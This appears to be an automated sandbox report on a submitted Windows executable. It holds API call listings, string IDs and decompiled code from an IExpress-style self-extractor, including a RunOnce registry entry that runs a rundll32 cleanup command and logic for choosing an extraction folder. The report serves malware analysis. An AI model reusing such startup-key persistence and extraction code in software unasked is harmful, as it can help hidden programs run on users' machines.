                                                                                                                                                                                                    			}

































                                                                                                                                                                                                    0x00fd202a
                                                                                                                                                                                                    0x00fd2035
                                                                                                                                                                                                    0x00fd203c
                                                                                                                                                                                                    0x00fd2041
                                                                                                                                                                                                    0x00fd2050
                                                                                                                                                                                                    0x00fd205f
                                                                                                                                                                                                    0x00fd2064
                                                                                                                                                                                                    0x00fd206f
                                                                                                                                                                                                    0x00fd208c
                                                                                                                                                                                                    0x00fd2094
                                                                                                                                                                                                    0x00fd2257
                                                                                                                                                                                                    0x00fd2266
                                                                                                                                                                                                    0x00fd2266
                                                                                                                                                                                                    0x00fd209a
                                                                                                                                                                                                    0x00fd209b
                                                                                                                                                                                                    0x00fd209d
                                                                                                                                                                                                    0x00fd20aa
                                                                                                                                                                                                    0x00fd20af
                                                                                                                                                                                                    0x00fd20c9
                                                                                                                                                                                                    0x00fd20d1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd20d3
                                                                                                                                                                                                    0x00fd20da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd20da
                                                                                                                                                                                                    0x00fd20e2
                                                                                                                                                                                                    0x00fd2103
                                                                                                                                                                                                    0x00fd210e
                                                                                                                                                                                                    0x00fd2116
                                                                                                                                                                                                    0x00fd2122
                                                                                                                                                                                                    0x00fd2128
                                                                                                                                                                                                    0x00fd212c
                                                                                                                                                                                                    0x00fd2179
                                                                                                                                                                                                    0x00fd2194
                                                                                                                                                                                                    0x00fd21de
                                                                                                                                                                                                    0x00fd21e4
                                                                                                                                                                                                    0x00fd2256
                                                                                                                                                                                                    0x00fd2256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2256
                                                                                                                                                                                                    0x00fd2196
                                                                                                                                                                                                    0x00fd2196
                                                                                                                                                                                                    0x00fd219c
                                                                                                                                                                                                    0x00fd219f
                                                                                                                                                                                                    0x00fd219f
                                                                                                                                                                                                    0x00fd21a1
                                                                                                                                                                                                    0x00fd21a2
                                                                                                                                                                                                    0x00fd21a6
                                                                                                                                                                                                    0x00fd21a8
                                                                                                                                                                                                    0x00fd21b0
                                                                                                                                                                                                    0x00fd21b0
                                                                                                                                                                                                    0x00fd21b2
                                                                                                                                                                                                    0x00fd21b3
                                                                                                                                                                                                    0x00fd21bc
                                                                                                                                                                                                    0x00fd21c7
                                                                                                                                                                                                    0x00fd21cb
                                                                                                                                                                                                    0x00fd21f1
                                                                                                                                                                                                    0x00fd21f6
                                                                                                                                                                                                    0x00fd21fd
                                                                                                                                                                                                    0x00fd21ff
                                                                                                                                                                                                    0x00fd21ff
                                                                                                                                                                                                    0x00fd2204
                                                                                                                                                                                                    0x00fd2213
                                                                                                                                                                                                    0x00fd2218
                                                                                                                                                                                                    0x00fd221d
                                                                                                                                                                                                    0x00fd221d
                                                                                                                                                                                                    0x00fd2220
                                                                                                                                                                                                    0x00fd2220
                                                                                                                                                                                                    0x00fd2222
                                                                                                                                                                                                    0x00fd2223
                                                                                                                                                                                                    0x00fd2229
                                                                                                                                                                                                    0x00fd223d
                                                                                                                                                                                                    0x00fd2249
                                                                                                                                                                                                    0x00fd2250
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2250
                                                                                                                                                                                                    0x00fd21d2
                                                                                                                                                                                                    0x00fd21d9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd21d9
                                                                                                                                                                                                    0x00fd213a
                                                                                                                                                                                                    0x00fd2141
                                                                                                                                                                                                    0x00fd2144
                                                                                                                                                                                                    0x00fd214c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2163
                                                                                                                                                                                                    0x00fd2172
                                                                                                                                                                                                    0x00fd2172
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2163
                                                                                                                                                                                                    0x00fd20ea
                                                                                                                                                                                                    0x00fd20f0
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00FD2050
                                                                                                                                                                                                    • memset.MSVCRT ref: 00FD205F
                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00FD208C
                                                                                                                                                                                                      • Part of subcall function 00FD171E: _vsnprintf.MSVCRT ref: 00FD1750
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD20C9
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD20EA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00FD2103
                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD2122
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00FD2134
                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD2144
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00FD215B
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD218C
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD21C1
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD21E4
                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00FD223D
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD2249
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FD2250
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
                                                                                                                                                                                                    • API String ID: 178549006-1281856606
                                                                                                                                                                                                    • Opcode ID: 299b4c23ed9dcf199b3095ee3f6885a2c78db2f6983b70d1a0a6166d2837ca3b
                                                                                                                                                                                                    • Instruction ID: 6190940e27c011f78bb2280b9c9a6440f3bf8755bcd234837ade3b46fc85cd8c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 299b4c23ed9dcf199b3095ee3f6885a2c78db2f6983b70d1a0a6166d2837ca3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21512772A01218ABDB20AF70DC4DFEB773FEB50740F0841A7F905E7251DA759D45AAA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 232 fd55a0-fd55d9 call fd468f LocalAlloc 235 fd55fd-fd560c call fd468f 232->235 236 fd55db-fd55f1 call fd44b9 call fd6285 232->236 241 fd560e-fd5630 call fd44b9 LocalFree 235->241 242 fd5632-fd5643 lstrcmpA 235->242 251 fd55f6-fd55f8 236->251 241->251 245 fd564b-fd5659 LocalFree 242->245 246 fd5645 242->246 249 fd565b-fd565d 245->249 250 fd5696-fd569c 245->250 246->245 254 fd565f-fd5667 249->254 255 fd5669 249->255 252 fd589f-fd58b5 call fd6517 250->252 253 fd56a2-fd56a8 250->253 256 fd58b7-fd58c7 call fd6ce0 251->256 252->256 253->252 257 fd56ae-fd56c1 GetTempPathA 253->257 254->255 258 fd566b-fd567a call fd5467 254->258 255->258 262 fd56f3-fd5711 call fd1781 257->262 263 fd56c3-fd56c9 call fd5467 257->263 270 fd589b-fd589d 258->270 271 fd5680-fd5691 call fd44b9 258->271 275 fd586c-fd5890 GetWindowsDirectoryA call fd597d 262->275 276 fd5717-fd5729 GetDriveTypeA 262->276 269 fd56ce-fd56d0 263->269 269->270 273 fd56d6-fd56df call fd2630 269->273 270->256 271->251 273->262 288 fd56e1-fd56ed call fd5467 273->288 275->262 289 fd5896 275->289 280 fd572b-fd572e 276->280 281 fd5730-fd5740 GetFileAttributesA 276->281 280->281 282 fd5742-fd5745 280->282 281->282 283 fd577e-fd578f call fd597d 281->283 286 fd576b 282->286 287 fd5747-fd574f 282->287 298 fd5791-fd579e call fd2630 283->298 299 fd57b2-fd57bf call fd2630 283->299 291 fd5771-fd5779 286->291 287->291 292 fd5751-fd5753 287->292 288->262 288->270 289->270 296 fd5864-fd5866 291->296 292->291 295 fd5755-fd5762 call fd6952 292->295 295->286 309 fd5764-fd5769 295->309 296->275 296->276 298->286 306 fd57a0-fd57b0 call fd597d 298->306 307 fd57c1-fd57cd GetWindowsDirectoryA 299->307 308 fd57d3-fd57f8 call fd658a GetFileAttributesA 299->308 306->286 306->299 307->308 314 fd580a 308->314 315 fd57fa-fd5808 CreateDirectoryA 308->315 309->283 309->286 316 fd580d-fd580f 314->316 315->316 317 fd5827-fd585c SetFileAttributesA call fd1781 call fd5467 316->317 318 fd5811-fd5825 316->318 317->270 323 fd585e 317->323 318->296 323->296
                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E00FD55A0(void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t35;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                    				int _t44;
                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				int _t54;
                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                    				char _t60;
                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                    				char _t66;
                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                    				int _t70;
                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                    				int _t73;
                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                    				CHAR* _t88;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                    				_t2 = E00FD468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                    				if(_t109 != 0) {
                                                                                                                                                                                                    					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                    					_t32 = E00FD468F(_t82, _t109, 1);
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                    							 *0xfd9a30 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						_t35 =  *0xfd8b3e; // 0x0
                                                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                                                    						if(_t35 == 0) {
                                                                                                                                                                                                    							__eflags =  *0xfd8a24; // 0x0
                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                    								L46:
                                                                                                                                                                                                    								_t101 = 0x7d2;
                                                                                                                                                                                                    								_t36 = E00FD6517(_t82, 0x7d2, 0, E00FD3210, 0, 0);
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_t38 =  ~( ~_t36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0xfd9a30; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t109 = 0xfd91e4;
                                                                                                                                                                                                    									_t40 = GetTempPathA(0x104, 0xfd91e4);
                                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                    										_push(_t82);
                                                                                                                                                                                                    										E00FD1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                    										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                    										if(_v268 <= 0x5a) {
                                                                                                                                                                                                    											do {
                                                                                                                                                                                                    												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                    												__eflags = _t109 - 6;
                                                                                                                                                                                                    												if(_t109 == 6) {
                                                                                                                                                                                                    													L22:
                                                                                                                                                                                                    													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                    													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L23;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													__eflags = _t109 - 3;
                                                                                                                                                                                                    													if(_t109 != 3) {
                                                                                                                                                                                                    														L23:
                                                                                                                                                                                                    														__eflags = _t109 - 2;
                                                                                                                                                                                                    														if(_t109 != 2) {
                                                                                                                                                                                                    															L28:
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                    															__eflags = _t66 - 0x41;
                                                                                                                                                                                                    															if(_t66 == 0x41) {
                                                                                                                                                                                                    																L29:
                                                                                                                                                                                                    																_t60 = _t66 + 1;
                                                                                                                                                                                                    																_v268 = _t60;
                                                                                                                                                                                                    																goto L42;
                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                    																__eflags = _t66 - 0x42;
                                                                                                                                                                                                    																if(_t66 == 0x42) {
                                                                                                                                                                                                    																	goto L29;
                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                    																	_t68 = E00FD6952( &_v268);
                                                                                                                                                                                                    																	__eflags = _t68;
                                                                                                                                                                                                    																	if(_t68 == 0) {
                                                                                                                                                                                                    																		goto L28;
                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                    																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                    																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                    																			L30:
                                                                                                                                                                                                    																			_push(0);
                                                                                                                                                                                                    																			_t103 = 3;
                                                                                                                                                                                                    																			_t49 = E00FD597D( &_v268, _t103, 1);
                                                                                                                                                                                                    																			__eflags = _t49;
                                                                                                                                                                                                    																			if(_t49 != 0) {
                                                                                                                                                                                                    																				L33:
                                                                                                                                                                                                    																				_t50 = E00FD2630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t50;
                                                                                                                                                                                                    																				if(_t50 != 0) {
                                                                                                                                                                                                    																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				_t88 =  &_v268;
                                                                                                                                                                                                    																				E00FD658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                    																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                    																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                    																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                    																					__eflags = _t54;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																				__eflags = _t54;
                                                                                                                                                                                                    																				if(_t54 != 0) {
                                                                                                                                                                                                    																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                    																					_push(_t88);
                                                                                                                                                                                                    																					_t109 = 0xfd91e4;
                                                                                                                                                                                                    																					E00FD1781(0xfd91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                    																					_t101 = 1;
                                                                                                                                                                                                    																					_t59 = E00FD5467(0xfd91e4, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t59;
                                                                                                                                                                                                    																					if(_t59 != 0) {
                                                                                                                                                                                                    																						goto L45;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						_t60 = _v268;
                                                                                                                                                                                                    																						goto L42;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t60 = _v268 + 1;
                                                                                                                                                                                                    																					_v265 = 0;
                                                                                                                                                                                                    																					_v268 = _t60;
                                                                                                                                                                                                    																					goto L42;
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                    																				_t65 = E00FD2630(0,  &_v268, 1);
                                                                                                                                                                                                    																				__eflags = _t65;
                                                                                                                                                                                                    																				if(_t65 != 0) {
                                                                                                                                                                                                    																					goto L28;
                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                    																					_t67 = E00FD597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t67;
                                                                                                                                                                                                    																					if(_t67 == 0) {
                                                                                                                                                                                                    																						goto L28;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						goto L33;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			goto L28;
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L22;
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L47;
                                                                                                                                                                                                    												L42:
                                                                                                                                                                                                    												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                    											} while (_t60 <= 0x5a);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L43;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t101 = 1;
                                                                                                                                                                                                    										_t69 = E00FD5467(0xfd91e4, 1, 3); // executed
                                                                                                                                                                                                    										__eflags = _t69;
                                                                                                                                                                                                    										if(_t69 != 0) {
                                                                                                                                                                                                    											goto L45;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t82 = 0xfd91e4;
                                                                                                                                                                                                    											_t70 = E00FD2630(0, 0xfd91e4, 1);
                                                                                                                                                                                                    											__eflags = _t70;
                                                                                                                                                                                                    											if(_t70 != 0) {
                                                                                                                                                                                                    												goto L19;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												_t101 = 1;
                                                                                                                                                                                                    												_t82 = 0xfd91e4;
                                                                                                                                                                                                    												_t71 = E00FD5467(0xfd91e4, 1, 1);
                                                                                                                                                                                                    												__eflags = _t71;
                                                                                                                                                                                                    												if(_t71 != 0) {
                                                                                                                                                                                                    													goto L45;
                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                    													do {
                                                                                                                                                                                                    														goto L19;
                                                                                                                                                                                                    														L43:
                                                                                                                                                                                                    														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                    														_push(4);
                                                                                                                                                                                                    														_t101 = 3;
                                                                                                                                                                                                    														_t82 =  &_v268;
                                                                                                                                                                                                    														_t44 = E00FD597D(_t82, _t101, 1);
                                                                                                                                                                                                    														__eflags = _t44;
                                                                                                                                                                                                    													} while (_t44 != 0);
                                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                    							if(_t35 != 0x5c) {
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								_t72 = 1;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0xfd8b3f - _t35; // 0x0
                                                                                                                                                                                                    								_t72 = 0;
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t101 = 0;
                                                                                                                                                                                                    							_t73 = E00FD5467(0xfd8b3e, 0, _t72);
                                                                                                                                                                                                    							__eflags = _t73;
                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                    								L45:
                                                                                                                                                                                                    								_t38 = 1;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t101 = 0x4be;
                                                                                                                                                                                                    								E00FD44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t101 = 0x4b1;
                                                                                                                                                                                                    						E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						 *0xfd9124 = 0x80070714;
                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t101 = 0x4b5;
                                                                                                                                                                                                    					E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L47:
                                                                                                                                                                                                    				return E00FD6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                    			}





































                                                                                                                                                                                                    0x00fd55ab
                                                                                                                                                                                                    0x00fd55b2
                                                                                                                                                                                                    0x00fd55c9
                                                                                                                                                                                                    0x00fd55d5
                                                                                                                                                                                                    0x00fd55d9
                                                                                                                                                                                                    0x00fd5600
                                                                                                                                                                                                    0x00fd5605
                                                                                                                                                                                                    0x00fd560a
                                                                                                                                                                                                    0x00fd560c
                                                                                                                                                                                                    0x00fd5638
                                                                                                                                                                                                    0x00fd5641
                                                                                                                                                                                                    0x00fd5643
                                                                                                                                                                                                    0x00fd5645
                                                                                                                                                                                                    0x00fd5645
                                                                                                                                                                                                    0x00fd564c
                                                                                                                                                                                                    0x00fd5652
                                                                                                                                                                                                    0x00fd5657
                                                                                                                                                                                                    0x00fd5659
                                                                                                                                                                                                    0x00fd5696
                                                                                                                                                                                                    0x00fd569c
                                                                                                                                                                                                    0x00fd589f
                                                                                                                                                                                                    0x00fd58a7
                                                                                                                                                                                                    0x00fd58ac
                                                                                                                                                                                                    0x00fd58b3
                                                                                                                                                                                                    0x00fd58b5
                                                                                                                                                                                                    0x00fd56a2
                                                                                                                                                                                                    0x00fd56a2
                                                                                                                                                                                                    0x00fd56a8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd56ae
                                                                                                                                                                                                    0x00fd56ae
                                                                                                                                                                                                    0x00fd56b9
                                                                                                                                                                                                    0x00fd56bf
                                                                                                                                                                                                    0x00fd56c1
                                                                                                                                                                                                    0x00fd56f3
                                                                                                                                                                                                    0x00fd56f3
                                                                                                                                                                                                    0x00fd5705
                                                                                                                                                                                                    0x00fd570a
                                                                                                                                                                                                    0x00fd5711
                                                                                                                                                                                                    0x00fd5717
                                                                                                                                                                                                    0x00fd5724
                                                                                                                                                                                                    0x00fd5726
                                                                                                                                                                                                    0x00fd5729
                                                                                                                                                                                                    0x00fd5730
                                                                                                                                                                                                    0x00fd5737
                                                                                                                                                                                                    0x00fd573d
                                                                                                                                                                                                    0x00fd5740
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd572b
                                                                                                                                                                                                    0x00fd572b
                                                                                                                                                                                                    0x00fd572e
                                                                                                                                                                                                    0x00fd5742
                                                                                                                                                                                                    0x00fd5742
                                                                                                                                                                                                    0x00fd5745
                                                                                                                                                                                                    0x00fd576b
                                                                                                                                                                                                    0x00fd576b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5747
                                                                                                                                                                                                    0x00fd5747
                                                                                                                                                                                                    0x00fd574d
                                                                                                                                                                                                    0x00fd574f
                                                                                                                                                                                                    0x00fd5771
                                                                                                                                                                                                    0x00fd5771
                                                                                                                                                                                                    0x00fd5773
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5751
                                                                                                                                                                                                    0x00fd5751
                                                                                                                                                                                                    0x00fd5753
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5755
                                                                                                                                                                                                    0x00fd575b
                                                                                                                                                                                                    0x00fd5760
                                                                                                                                                                                                    0x00fd5762
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5764
                                                                                                                                                                                                    0x00fd5764
                                                                                                                                                                                                    0x00fd5769
                                                                                                                                                                                                    0x00fd577e
                                                                                                                                                                                                    0x00fd577e
                                                                                                                                                                                                    0x00fd5781
                                                                                                                                                                                                    0x00fd5788
                                                                                                                                                                                                    0x00fd578d
                                                                                                                                                                                                    0x00fd578f
                                                                                                                                                                                                    0x00fd57b2
                                                                                                                                                                                                    0x00fd57b8
                                                                                                                                                                                                    0x00fd57bd
                                                                                                                                                                                                    0x00fd57bf
                                                                                                                                                                                                    0x00fd57cd
                                                                                                                                                                                                    0x00fd57cd
                                                                                                                                                                                                    0x00fd57dd
                                                                                                                                                                                                    0x00fd57e3
                                                                                                                                                                                                    0x00fd57ef
                                                                                                                                                                                                    0x00fd57f5
                                                                                                                                                                                                    0x00fd57f8
                                                                                                                                                                                                    0x00fd580a
                                                                                                                                                                                                    0x00fd580a
                                                                                                                                                                                                    0x00fd57fa
                                                                                                                                                                                                    0x00fd5802
                                                                                                                                                                                                    0x00fd5802
                                                                                                                                                                                                    0x00fd580d
                                                                                                                                                                                                    0x00fd580f
                                                                                                                                                                                                    0x00fd5830
                                                                                                                                                                                                    0x00fd5836
                                                                                                                                                                                                    0x00fd583d
                                                                                                                                                                                                    0x00fd584b
                                                                                                                                                                                                    0x00fd5851
                                                                                                                                                                                                    0x00fd5855
                                                                                                                                                                                                    0x00fd585a
                                                                                                                                                                                                    0x00fd585c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd585e
                                                                                                                                                                                                    0x00fd585e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd585e
                                                                                                                                                                                                    0x00fd5811
                                                                                                                                                                                                    0x00fd5817
                                                                                                                                                                                                    0x00fd5819
                                                                                                                                                                                                    0x00fd581f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd581f
                                                                                                                                                                                                    0x00fd5791
                                                                                                                                                                                                    0x00fd5797
                                                                                                                                                                                                    0x00fd579c
                                                                                                                                                                                                    0x00fd579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd57a0
                                                                                                                                                                                                    0x00fd57a9
                                                                                                                                                                                                    0x00fd57ae
                                                                                                                                                                                                    0x00fd57b0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
